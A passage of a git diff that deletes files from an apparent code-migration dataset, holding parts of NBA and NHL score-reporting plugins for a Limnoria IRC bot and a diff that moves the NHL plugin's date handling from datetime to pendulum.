should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that have been played: - team_past_games = team_schedule['standard'][:last_played+1] - - # Making sure the number of games we will show is a valid one: - if n is None: - n = 1 - n = min(MAX_GAMES_IN_RESULT, n) - - if team2 is None: - games = team_past_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in team_past_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find past games.') - return - - for game in reversed(games[-n:]): # Most-recent game first. - irc.reply(self._pastGameToString(game)) - - - nbalast = wrap(nbalast, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - @classmethod - def _parseOptionalArguments(cls, optional_team, optional_date): - """Parse the optional arguments, which could be None, and return - a (team, date) tuple. In case of finding an invalid argument, it - throws a ValueError exception. - """ - # No arguments: - if optional_team is None: - return (None, None) - - # Both arguments: - if (optional_date is not None) and (optional_team is not None): - team = cls._parseTeamInput(optional_team) - date = cls._parseDateInput(optional_date) - return (team, date) - - # Only one argument: - if cls._isPotentialDate(optional_team): - # Should be a date. - team = None - date = cls._parseDateInput(optional_team) - else: - # Should be a team. - team = cls._parseTeamInput(optional_team) - date = None - - return (team, date) - - def _getTodayGames(self): - return self._getGames(self._getTodayDate()) - - def _getGamesForDate(self, date): - return self._getGames(date) - - @staticmethod - def _filterGamesWithTeam(team, games): - """Given a list of games, return those that involve a given - team. If team is None, return the list with no modifications. - """ - if team is None: - return games - - return [g for g in games if team == g['home_team'] - or team == g['away_team']] - -############################ -# Content-getting helpers -############################ - def _getTodayJSON(self): - today_url = self._ENDPOINT_BASE_URL + '/10s/prod/v3/today.json' - return self._getJSON(today_url) - - def _getGames(self, date): - """Given a date, populate the url with it and try to download - its content. If successful, parse the JSON data and extract the - relevant fields for each game. Returns a list of games. - """ - url = self._getEndpointURL(date) - - # If asking for today's results, revalidate the cached data. - # ('If-Mod.-Since' flag.). This allows to get real-time scores. - revalidate_cache = (date == self._getTodayDate()) - response = self._getURL(url, revalidate_cache) - - json_data = self._extractJSON(response) - - return self._parseGames(json_data) - - @classmethod - def _getEndpointURL(cls, date): - return cls._SCOREBOARD_ENDPOINT.format(date) - - def _getTeamSchedule(self, tricode): - """Fetch the json with the given team's schedule""" - - # First we fetch `today.json` to extract the path to teams' - # schedules and `seasonScheduleYear`: - today_json = self._getTodayJSON() - schedule_path = today_json['links']['teamScheduleYear2'] - season_year = today_json['seasonScheduleYear'] - - # We also need to convert the `tricode` to a `team_id`: - team_id = self._tricodeToTeamId(tricode) - - # (The path looks like this: - # '/prod/v1/{{seasonScheduleYear}}/teams/{{teamId}}/schedule.json') - - # Now we can fill-in the url: - schedule_path = schedule_path.replace('{{teamId}}', team_id) - schedule_path = schedule_path.replace('{{seasonScheduleYear}}', - str(season_year)) - - return self._getJSON(self._ENDPOINT_BASE_URL + schedule_path)['league'] - - def _tricodeToTeamId(self, tricode): - """Given a valid team tricode, get the `teamId` used in NBA.com""" - - teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams'] - teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path) - - for team in teams_json['league']['standard']: - if team['tricode'] == tricode: - return team['teamId'] - - raise ValueError('{} is not a valid tricode'.format(tricode)) - - def _teamIdToTricode(self, team_id): - """Given a valid teamId, get the team's tricode""" - - teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams'] - teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path) - - for team in teams_json['league']['standard']: - if team['teamId'] == team_id: - return team['tricode'] - - raise ValueError('{} is not a valid teamId'.format(team_id)) - - def _getURL(self, url, force_revalidation=False): - """Use httplib2 to download the URL's content. - - The `force_revalidation` parameter forces the data to be - validated before being returned from the cache. - In the worst case the data has not changed in the server, - and we get a '304 - Not Modified' response. - """ - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - - if force_revalidation: - header['Cache-Control'] = 'max-age=0' - - response, content = self._http.request(url, 'GET', headers=header) - - if response.fromcache: - self.log.debug('%s - 304/Cache Hit', url) - - if response.status == 200: - return content - - self.log.error('HTTP Error (%s): %s', url, error.code) - raise ConnectionError('Could not access URL') - - @staticmethod - def _extractJSON(body): - return json.loads(body) - - def _getJSON(self, url): - """Fetch `url` and return its contents decoded as json.""" - return self._extractJSON(self._getURL(url)) - - @classmethod - def _parseGames(cls, json_data): - """Extract all relevant fields from NBA.com's scoreboard.json - and return a list of games. - """ - games = [] - for g in json_data['games']: - # Starting times are in UTC. By default, we will show - # Eastern times. - # (In the future we could add a user option to select - # timezones.) - try: - starting_time = cls._ISODateToEasternTime(g['startTimeUTC']) - except: - starting_time = 'TBD' if g['isStartTimeTBD'] else '' - - game_info = {'game_id': g['gameId'], - 'home_team': g['hTeam']['triCode'], - 'away_team': g['vTeam']['triCode'], - 'home_score': g['hTeam']['score'], - 'away_score': g['vTeam']['score'], - 'starting_year': g['startDateEastern'][0:4], - 'starting_month': g['startDateEastern'][4:6], - 'starting_day': g['startDateEastern'][6:8], - 'starting_time': starting_time, - 'starting_time_TBD': g['isStartTimeTBD'], - 'clock': g['clock'], - 'period': g['period'], - 'buzzer_beater': g['isBuzzerBeater'], - 'ended': (g['statusNum'] == 3), - 'text_nugget': g['nugget']['text'].strip(), - 'tv_broadcasters': cls._extractGameBroadcasters(g) - } - - games.append(game_info) - - return games - - @staticmethod - def _extractGameBroadcasters(game_json): - """Extract the list of broadcasters from the API. - Return a dictionary of broadcasts: - (['vTeam', 'hTeam', 'national', 'canadian']) to - the short name of the broadcaster. - """ - json_data = game_json['watch']['broadcast']['broadcasters'] - game_broadcasters = dict() - - for category in json_data: - broadcasters_list = json_data[category] - if broadcasters_list and 'shortName' in broadcasters_list[0]: - game_broadcasters[category] = broadcasters_list[0]['shortName'] - return game_broadcasters - -############################ -# Formatting helpers -############################ - @classmethod - def _resultAsString(cls, games): - if not games: - return "No games found" - - # sort games list and put F(inal) games at end - sorted_games = sorted(games, key=lambda k: k['ended']) - return ' | '.join([cls._gameToString(g) for g in sorted_games]) - - @classmethod - def _gameToString(cls, game): - """ Given a game, format the information into a string - according to the context. - - For example: - * "MEM @ CLE 07:00 PM ET" (a game that has not started yet), - * "HOU 132 GSW 127 F OT2" (a game that ended and went to 2 - overtimes), - * "POR 36 LAC 42 8:01 Q2" (a game in progress). - """ - away_team = game['away_team'] - home_team = game['home_team'] - - if game['period']['current'] == 0: # The game hasn't started yet - starting_time = game['starting_time'] \ - if not game['starting_time_TBD'] \ - else "TBD" - return "{} @ {} {}".format(away_team, home_team, starting_time) - - # The game started => It has points: - away_score = game['away_score'] - home_score = game['home_score'] - - away_string = "{} {}".format(away_team, away_score) - home_string = "{} {}".format(home_team, home_score) - - # Bold for the winning team: - if int(away_score) > int(home_score): - away_string = ircutils.bold(away_string) - elif int(home_score) > int(away_score): - home_string = ircutils.bold(home_string) - - game_string = "{} {} {}".format(away_string, home_string, - cls._clockBoardToString(game['clock'], - game['period'], - game['ended'])) - # Highlighting 'buzzer-beaters': - if game['buzzer_beater'] and not game['ended']: - game_string = ircutils.mircColor(game_string, fg='yellow', - bg='black') - - return game_string - - @classmethod - def _clockBoardToString(cls, clock, period, game_ended): - """Get a string with current period and, if the game is still - in progress, the remaining time in it. - """ - period_number = period['current'] - # Game hasn't started => There is no clock yet. - if period_number == 0: - return '' - - # Halftime - if period['isHalftime']: - return ircutils.mircColor('Halftime', 'orange') - - period_string = cls._periodToString(period_number) - - # Game finished: - if game_ended: - if period_number == 4: - return ircutils.mircColor('F', 'red') - - return ircutils.mircColor("F {}".format(period_string), 'red') - - # Game in progress: - if period['isEndOfPeriod']: - return ircutils.mircColor("E{}".format(period_string), 'blue') - - # Period in progress, show clock: - return "{} {}".format(clock, ircutils.mircColor(period_string, - 'green')) - - @staticmethod - def _periodToString(period): - """Get a string describing the current period in the game. - - Period is an integer counting periods from 1 (so 5 would be - OT1). - The output format is as follows: {Q1...Q4} (regulation); - {OT, OT2, OT3...} (overtimes). - """ - if period <= 4: - return "Q{}".format(period) - - ot_number = period - 4 - if ot_number == 1: - return "OT" - return "OT{}".format(ot_number) - - @staticmethod - def _broadcastersToString(broadcasters): - """Given a broadcasters dictionary (category->name), where - category is in ['vTeam', 'hTeam', 'national', 'canadian'], - return a printable string representation of that list. - """ - items = [] - for category in ['vTeam', 'hTeam', 'national', 'canadian']: - if category in broadcasters: - items.append(broadcasters[category]) - return ', '.join(items) - - def _upcomingGameToString(self, game): - """Given a team's upcoming game, return a string with - the opponent's tricode and the date of the game. - """ - - date = self._ISODateToEasternDatetime(game['startTimeUTC']) - - home_tricode = self._teamIdToTricode(game['hTeam']['teamId']) - away_tricode = self._teamIdToTricode(game['vTeam']['teamId']) - - if game['isHomeTeam']: - home_tricode = ircutils.bold(home_tricode) - else: - away_tricode = ircutils.bold(away_tricode) - - return '{} | {} @ {}'.format(date, away_tricode, home_tricode) - - def _pastGameToString(self, game): - """Given a team's upcoming game, return a string with - the opponent's tricode and the result. - """ - date = self._ISODateToEasternDate(game['startTimeUTC']) - - home_tricode = self._teamIdToTricode(game['hTeam']['teamId']) - away_tricode = self._teamIdToTricode(game['vTeam']['teamId']) - - home_score = int(game['hTeam']['score']) - away_score = int(game['vTeam']['score']) - - if game['isHomeTeam']: - was_victory = (home_score > away_score) - else: - was_victory = (away_score > home_score) - - if home_score > away_score: - home_tricode = ircutils.bold(home_tricode) - home_score = ircutils.bold(home_score) - else: - away_tricode = ircutils.bold(away_tricode) - away_score = ircutils.bold(away_score) - - result = ircutils.mircColor('W', 'green') if was_victory \ - else ircutils.mircColor('L', 'red') - - points = '{} {} {} {}'.format(away_tricode, away_score, - home_tricode, home_score) - - if game['seasonStageId'] == 1: - points += ' (Preseason)' - - return '{} {} | {}'.format(date, result, points) - -############################ -# Date-manipulation helpers -############################ - @classmethod - def _getTodayDate(cls): - """Get the current date formatted as "YYYYMMDD". - Because the API separates games by day of start, we will - consider and return the date in the Pacific timezone. - The objective is to avoid reading future games anticipatedly - when the day rolls over at midnight, which would cause us to - ignore games in progress that may have started on the previous - day. - Taking the west coast time guarantees that the day will advance - only when the whole continental US is already on that day. - """ - today = cls._pacificTimeNow().date() - today_iso = today.isoformat() - return today_iso.replace('-', '') - - @staticmethod - def _easternTimeNow(): - return pendulum.now('US/Eastern') - - @staticmethod - def _pacificTimeNow(): - return pendulum.now('US/Pacific') - - @staticmethod - def _ISODateToEasternDate(iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern-time date. - (The default human-readable format for the listing of games). - """ - date = pendulum.parse(iso) - date_eastern = date.in_tz('US/Eastern') - eastern_date = date_eastern.strftime('%a %m/%d') - return "{}".format(eastern_date) - - @staticmethod - def _ISODateToEasternTime(iso): - """Convert the ISO date in UTC time that the API outputs into an - Eastern time formatted with am/pm. - (The default human-readable format for the listing of games). - """ - date = pendulum.parse(iso) - date_eastern = date.in_tz('US/Eastern') - eastern_time = date_eastern.strftime('%-I:%M %p') - return "{} ET".format(eastern_time) - - @staticmethod - def _ISODateToEasternDatetime(iso): - """Convert the ISO date in UTC time that the API outputs into a - string with a date and Eastern time formatted with am/pm. - """ - date = pendulum.parse(iso) - date_eastern = date.in_tz('US/Eastern') - eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p') - return "{} ET".format(eastern_datetime) - - @staticmethod - def _stripDateSeparators(date_string): - return date_string.replace('-', '') - - @classmethod - def _EnglishDateToDate(cls, date): - """Convert a human-readable like 'yesterday' to a datetime - object and return a 'YYYYMMDD' string. - """ - if date == 'yesterday': - day_delta = -1 - elif date == 'today' or date == 'tonight': - day_delta = 0 - elif date == 'tomorrow': - day_delta = 1 - # Calculate the day difference and return a string - date_string = cls._pacificTimeNow().add(days=day_delta).strftime('%Y%m%d') - return date_string - - @classmethod - def _isValidTricode(cls, team): - return team in cls._TEAM_TRICODES - -############################ -# Input-parsing helpers -############################ - @classmethod - def _isPotentialDate(cls, string): - """Given a user-provided string, check whether it could be a - date. - """ - return (string.lower() in cls._FUZZY_DAYS or - string.replace('-', '').isdigit()) - - @classmethod - def _parseTeamInput(cls, team): - """Given a user-provided string, try to extract an upper-case - team tricode from it. If not valid, throws a ValueError - exception. - """ - t = team.upper() - if not cls._isValidTricode(t): - raise ValueError('{} is not a valid team'.format(team)) - return t - - @classmethod - def _parseDateInput(cls, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, - so we will check that the input is not a date earlier than that. - In case of failure, throws a ValueError exception. - """ - date = date.lower() - - if date in cls._FUZZY_DAYS: - date = cls._EnglishDateToDate(date) - - elif date.replace('-', '').isdigit(): - try: - parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - # The current API goes back until 2014-10-04. Is it in range? - if parsed_date < pendulum.datetime(2014, 10, 4): - raise ValueError('I can only go back until 2014-10-04') - else: - raise ValueError('Date is not valid') - - return cls._stripDateSeparators(date) - - - def _getRecapInfo(self, game): - """Given a finished game, fetch its recap summary and a link - to its video recap. It returns a string with the format - '{summary} (link to video)'. - - The link is shortened by calling _shortenURL(str) -> str. - """ - - recap_base_url = 'https://www.nba.com/video/'\ - '{year}/{month}/{day}/'\ - '{game_id}-{away_team}-{home_team}-recap.xml' - - url = recap_base_url.format(year=game['starting_year'], - month=game['starting_month'], - day=game['starting_day'], - game_id=game['game_id'], - away_team=game['away_team'].lower(), - home_team=game['home_team'].lower()) - - xml = self._getURL(url) - tree = ElementTree.fromstring(xml) - - res = [] - - summary = tree.find('description') - if summary is not None: - res.append(summary.text) - - video_recap = tree.find("*file[@bitrate='1920x1080_5904']") - if video_recap is not None: - url = self._shortenURL(video_recap.text) - res.append('({})'.format(url)) - - return ' '.join(res) - - @staticmethod - def _shortenURL(url): - """ Run a link through an URL shortener and return the new url.""" - - # Complete with the code that uses your desired - # shortener service. - return url - - -Class = NBA - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.diff b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.diff deleted file mode 100644 index 0c7d8ba..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.diff +++ /dev/null @@ -1,161 +0,0 @@ -diff --git a/NHL/plugin.py b/NHL/plugin.py - index e0266f6987d1e60d6d4f343d0edcd2cbe2407251..33c7a3fc0878d87ee803db91c17523a9e61af3ed 100644 - --- a/NHL/plugin.py - +++ b/NHL/plugin.py -@@ -21,6 +21,11 @@ from supybot.commands import * - import supybot.plugins as plugins - import supybot.ircutils as ircutils - import supybot.callbacks as callbacks -+import json -+import urllib.request -+import pendulum -+import requests -+ - try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NHL') -@@ -29,14 +34,6 @@ except ImportError: - # without the i18n module - _ = lambda x: x - --import datetime --import dateutil.parser --import json --import pytz --import urllib.request --import pendulum --import requests -- - class NHL(callbacks.Plugin): - """Get scores from NHL.com.""" - def __init__(self, irc): -@@ -118,7 +115,7 @@ class NHL(callbacks.Plugin): - irc.reply("No games found for {}".format(team)) - return - try: -- tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') -+ tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -137,7 +134,7 @@ class NHL(callbacks.Plugin): - irc.reply("No games found for {}".format(team)) - return - try: -- tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') -+ tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -198,7 +195,7 @@ class NHL(callbacks.Plugin): - games = self._getTodayTV(team) - games_string = self._resultTVAsString(games) - try: -- tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') -+ tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -215,7 +212,7 @@ class NHL(callbacks.Plugin): - return - games_string = self._resultTVAsString(games) - try: -- tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') -+ tdate = pendulum.from_format(games[0], 'YYYY-MM-DD').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' -@@ -595,10 +592,10 @@ class NHL(callbacks.Plugin): - return today_iso #.replace('-', '') - - def _easternTimeNow(self): -- return datetime.datetime.now(pytz.timezone('US/Eastern')) -+ return pendulum.now('US/Eastern') - - def _pacificTimeNow(self): -- return datetime.datetime.now(pytz.timezone('US/Pacific')) -+ return pendulum.now('US/Pacific') - - def _convertISODateToTime(self, iso, target='US/Eastern'): - """Convert the ISO date in UTC time that the API outputs into a -@@ -684,17 +681,16 @@ class NHL(callbacks.Plugin): - date_string = pendulum.now('US/Pacific').next(pendulum.SATURDAY).format('YYYY-MM-DD') - return date_string - # Calculate the day difference and return a string -- date_string = (self._pacificTimeNow() + -- datetime.timedelta(days=day_delta)).strftime('%Y-%m-%d') -+ date_string = self._pacificTimeNow().add(days=day_delta).strftime('%Y-%m-%d') - return date_string - - def _checkDateInput(self, date): - """Verify that the given string is a valid date formatted as - YYYY-MM-DD. Also, the API seems to go back until 2014-10-04, so we - will check that the input is not a date earlier than that.""" -- -+ - error_string = 'Incorrect date format, should be YYYY-MM-DD' -- -+ - if date is None: - return None - -@@ -702,30 +698,20 @@ class NHL(callbacks.Plugin): - date = self._EnglishDateToDate(date) - elif date[:3].lower() in self._FUZZY_DAYS: - date = self._EnglishDateToDate(date.lower()) --# elif date[:3].upper() in self._TEAMS_BY_TRI: --# date = date[:3].upper() --# return date -- -- #try: -- # date = dateutil.parser.parse(date) -- #except: -- # raise ValueError('Incorrect date format, should be YYYY-MM-DD') -- -- #print(date) -- -+ - if date.isdigit(): - try: -- date = datetime.datetime.strptime(date, '%Y%m%d').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'YYYYMMDD').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('-','').isdigit(): - try: -- parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') -+ parsed_date = pendulum.from_format(date, 'YYYY-MM-DD') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif date.replace('/','').isdigit(): - if len(date.split('/')) == 2: -- year = '/' + str(datetime.datetime.now().year) -+ year = '/' + str(pendulum.datetime.now().year) - date += year - elif len(date.split('/')) == 3: - if len(date.split('/')[2]) == 2: -@@ -733,7 +719,7 @@ class NHL(callbacks.Plugin): - else: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - try: -- date = datetime.datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'MM/DD/YYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - elif '-' not in date and date.isdigit() == False and len(date) > 3: -@@ -741,12 +727,12 @@ class NHL(callbacks.Plugin): - return "Incorrect date format, should be YYYY-MM-DD" - try: - date = date.title() -- year = str(datetime.datetime.now().year) -+ year = str(pendulum.datetime.now().year) - date += year - try: -- date = datetime.datetime.strptime(date, '%d%b%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'DDMMMYYYY').strftime('%Y-%m-%d') - except: -- date = datetime.datetime.strptime(date, '%b%d%Y').strftime('%Y-%m-%d') -+ date = pendulum.from_format(date, 'MMMDDYYYY').strftime('%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - #return "Incorrect date format, should be YYYY-MM-DD" diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py deleted file mode 100644 index a69d155..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NHL$plugin.py.source.py +++ /dev/null @@ -1,760 +0,0 @@ -### -# Copyright (c) 2016, Santiago Gil -# Copyright (c) 2020, oddluck -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -### - -import supybot.utils as utils -from supybot.commands import * -import supybot.plugins as plugins -import supybot.ircutils as ircutils -import supybot.callbacks as callbacks -try: - from supybot.i18n import PluginInternationalization - _ = PluginInternationalization('NHL') -except ImportError: - # Placeholder that allows to run the plugin on a bot - # without the i18n module - _ = lambda x: x - -import datetime -import dateutil.parser -import json -import pytz -import urllib.request -import pendulum -import requests - -class NHL(callbacks.Plugin): - """Get scores from NHL.com.""" - def __init__(self, irc): - self.__parent = super(NHL, self) - self.__parent.__init__(irc) - - self._SCOREBOARD_ENDPOINT = ("https://statsapi.web.nhl.com/api/v1/schedule?startDate={}&endDate={}" + - "&expand=schedule.teams,schedule.linescore,schedule.broadcasts.all,schedule.ticket,schedule.game.content.media.epg" + - "&leaderCategories=&site=en_nhl&teamId=") - # https://statsapi.web.nhl.com/api/v1/schedule?startDate=2016-12-15&endDate=2016-12-15 - # &expand=schedule.teams,schedule.linescore,schedule.broadcasts,schedule.ticket,schedule.game.content.media.epg - # &leaderCategories=&site=en_nhl&teamId= - - self._FUZZY_DAYS = ['yesterday', 'tonight', 'today', 'tomorrow', - 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'] - - # These two variables store the latest data acquired from the server - # and its modification time. It's a one-element cache. - # They are used to employ HTTP's 'If-Modified-Since' header and - # avoid unnecessary downloads for today's information (which will be - # requested all the time to update the scores). - self._today_scores_cached_url = None - self._today_scores_last_modified_time = None - self._today_scores_last_modified_data = None - - self._TEAMS_BY_TRI = self._getTeams() - - #pendulum.set_formatter('alternative') - - def nhl(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get games for a given date (YYYY-MM-DD). If none is specified, return games - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. - tz = None - if optional_team is None: - team = "all" - if optional_date: - if '--tz' in optional_date: - tz = optional_date.split()[2] - optional_date = optional_date.split()[0] - try: - date = self._checkDateInput(optional_date) - #print("1") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - if optional_team == '--tz': - tz = optional_date - team = 'all' - date = None - else: - date = self._checkDateInput(optional_team) - #print("2") - if date: # and len(date) != 3: - team = "all" -# elif date and len(date) == 3: -# team = date -# date = None - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - #print("3") - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - if not tz: - tz = 'US/Eastern' - games = self._getTodayGames(team, tz) - games_string = self._resultAsString(games) - if not games_string: - irc.reply("No games found for {}".format(team)) - return - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[1]['clock'], games[1]['ended']) - if len(games) == 2: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - #print(games) - irc.reply(games_string_date + games_string) - else: - games = self._getGamesForDate(team, date) - games_string = self._resultAsString(games) - #print(games_string) - if games_string == '': - irc.reply("No games found for {}".format(team)) - return - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - nhl = wrap(nhl, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTeams(self): - - url = 'https://statsapi.web.nhl.com/api/v1/teams' - try: - data = requests.get(url).json() - data = data['teams'] - except: - return None - - teams = [] - for team in data: - teams.append(team['abbreviation']) - return teams - - def nhltv(self, irc, msg, args, optional_team, optional_date): - """[] [] - Get television broadcasts for a given date (YYYY-MM-DD). If none is specified, return broadcasts - scheduled for today. Optionally add team abbreviation to filter - for a specific team.""" - - # Check to see if there's optional input and if there is check if it's - # a date or a team, or both. - if optional_team is None: - team = "all" - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - else: - date = self._checkDateInput(optional_team) - if date: - team = "all" - else: - team = optional_team.upper() - try: - date = self._checkDateInput(optional_date) - except ValueError as e: - irc.reply('ERROR: {0!s}'.format(e)) - return - - if date is None: - games = self._getTodayTV(team) - games_string = self._resultTVAsString(games) - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - #print(games[0]['clock'], games[0]['ended']) - if len(games) == 1: - if not games[1]['ended']: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - irc.reply(games_string_date + games_string) - else: - games = self._getTVForDate(team, date) - if isinstance(games, str): - irc.reply(games) - return - games_string = self._resultTVAsString(games) - try: - tdate = datetime.datetime.strptime(games[0], '%Y-%m-%d').strftime('%m/%d/%y') - games_string_date = ircutils.bold(tdate + ': ') - except: - games_string_date = '' - if len(games) == 1: - if not games[1]['ended']: - try: - broadcasts = games[1]['broadcasts'] - games_string += ' [{}]'.format(broadcasts) - except: - pass - #irc.reply(games_string) - irc.reply(games_string_date + games_string) - - #if date is None: - # irc.reply(self._getTodayTV(team)) - #else: - # irc.reply(self._getTVForDate(team, date)) - - nhltv = wrap(nhltv, [optional('somethingWithoutSpaces'), optional('somethingWithoutSpaces')]) - - def _getTodayGames(self, team, tz='US/Eastern'): - games = self._getGames(team, self._getTodayDate(), tz) - return games - - def _getGamesForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - - def _getTodayTV(self, team): - games = self._getGames(team, self._getTodayDate()) - return games - - def _getTVForDate(self, team, date): - #print(date) - games = self._getGames(team, date) - return games - -############################ -# Content-getting helpers -############################ - def _getGames(self, team, date, tz='US/Eastern'): - """Given a date, populate the url with it and try to download its - content. If successful, parse the JSON data and extract the relevant - fields for each game. Returns a list of games.""" - url = self._getEndpointURL(date) - - # (If asking for today's results, enable the 'If-Mod.-Since' flag) - use_cache = (date == self._getTodayDate()) - #use_cache = False - response = self._getURL(url, use_cache) - if isinstance(response, str): - return "ERROR: Something went wrong, check input" - - json = self._extractJSON(response) - games = self._parseGames(json, team, tz) - return games - - def _getEndpointURL(self, date): - return self._SCOREBOARD_ENDPOINT.format(date, date) - - def _getURL(self, url, use_cache=False): - """Use urllib to download the URL's content. The use_cache flag enables - the use of the one-element cache, which will be reserved for today's - games URL. (In the future we could implement a real cache with TTLs).""" - user_agent = 'Mozilla/5.0 \ - (X11; Ubuntu; Linux x86_64; rv:45.0) \ - Gecko/20100101 Firefox/45.0' - header = {'User-Agent': user_agent} - response = None - - # ('If-Modified-Since' to avoid unnecessary downloads.) - if use_cache and self._haveCachedData(url): - header['If-Modified-Since'] = self._today_scores_last_modified_time - - request = urllib.request.Request(url, headers=header) - #print(url) - - try: - response = urllib.request.urlopen(request) - except urllib.error.HTTPError as error: - if use_cache and error.code == 304: # Cache hit - self.log.info("{} - 304" - "(Last-Modified: " - "{})".format(url, self._cachedDataLastModified())) - return self._cachedData() - else: - self.log.error("HTTP Error ({}): {}".format(url, error.code)) - pass - - self.log.info("{} - 200".format(url)) - - if not response: - return "ERROR: Something went wrong, check input" - - if not use_cache: - return response.read() - - # Updating the cached data: - self._updateCache(url, response) - return self._cachedData() - - def _extractJSON(self, body): - return json.loads(body.decode('utf-8')) - - def _parseGames(self, json, team, tz='US/Eastern'): - """Extract all relevant fields from NHL.com's json - and return a list of games.""" - games = [] - if json['totalGames'] == 0: - return games - games.append(json['dates'][0]['date']) - for g in json['dates'][0]['games']: - #print(g) - # Starting times are in UTC. By default, we will show Eastern times. - # (In the future we could add a user option to select timezones.) - tbd_check = self._ISODateToEasternTime(g['gameDate']) - #print(tbd_check) - if '3:00 AM' in tbd_check: - starting_time = 'TBD' - #starting_time_TBD = True - else: - if 'US/Eastern' not in tz: - starting_time = self._convertISODateToTime(g['gameDate'], tz) - else: - starting_time = self._ISODateToEasternTime(g['gameDate']) - broadcasts = [] - try: - for item in g['broadcasts']: - broadcasts.append(item['name']) - except: - pass - #print(broadcasts) - game_info = {'home_team': g['teams']['home']['team']['abbreviation'], - 'away_team': g['teams']['away']['team']['abbreviation'], - 'home_score': g['teams']['home']['score'], - 'away_score': g['teams']['away']['score'], - 'broadcasts': '{}'.format(', '.join(item for item in broadcasts)), - 'starting_time': starting_time, - 'starting_time_TBD': g['status']['startTimeTBD'], - 'pregame': (True if 'Pre-Game' in g['status']['detailedState'] else False), - 'period': 